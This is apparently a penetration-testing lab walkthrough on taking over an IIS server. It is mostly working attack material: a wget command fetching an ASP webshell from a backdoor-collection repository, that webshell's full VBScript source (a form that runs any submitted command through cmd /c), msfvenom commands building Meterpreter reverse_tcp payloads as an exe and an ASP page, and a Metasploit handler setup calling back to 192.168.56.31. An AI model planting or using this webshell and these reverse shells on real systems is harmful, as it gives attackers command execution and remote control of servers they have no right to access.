Initial Shell

wget -O aspcmd.asp https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/aspcmd.asp

Fetch the raw file: the /blob/ URL on github.com returns GitHub's HTML page, not the script, and IIS would serve that back as a broken page. The help text built into the downloaded shell lists the three things its command box accepts:

        output = "    ?                    this help page\n" +
           "    :sv                  all server variables\n" +
           "    <shell command>      execute any shell command\n";
<%
' Minimal VBScript webshell: the POSTed "param" is handed to cmd /c through
' WScript.Shell and stdout is returned. It runs as the IIS application pool
' identity, so the attacker gets exactly that account's rights.
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.Exec(theParam)
    ' ReadAll blocks until the process closes stdout, so interactive
    ' commands hang the request.
    getResult = objResult.StdOut.ReadAll
End Function

' Read the command before the form is rendered so the input box echoes it.
Dim myValue, thisDir
myValue = Request("param")
If myValue <> "" Then
    ' Space after /c, and 2>&1 so error output is returned as well.
    thisDir = getResult("cmd /c " & myValue & " 2>&1")
End If
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% Response.Write(thisDir) %>
        </p>
        <br>
    </BODY>
</HTML>
  • The webshell is uploaded to the upload folder.

  • We now have command execution on the IIS server.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.31 lport=1234 -f exe > shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.31 lport=1234 -f asp > shelldaddy.asp

You don't have to rely on Meterpreter's getprivs command: the enabled privileges can also be listed with the whoami command and its /priv option, as shown in the image below. The session we gained through exploitation runs as the user iisapppool, the IIS application pool identity.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.31
set lport 1234
exploit -j

Start the handler before shell.exe is run on the target, otherwise the callback has nothing to connect to.
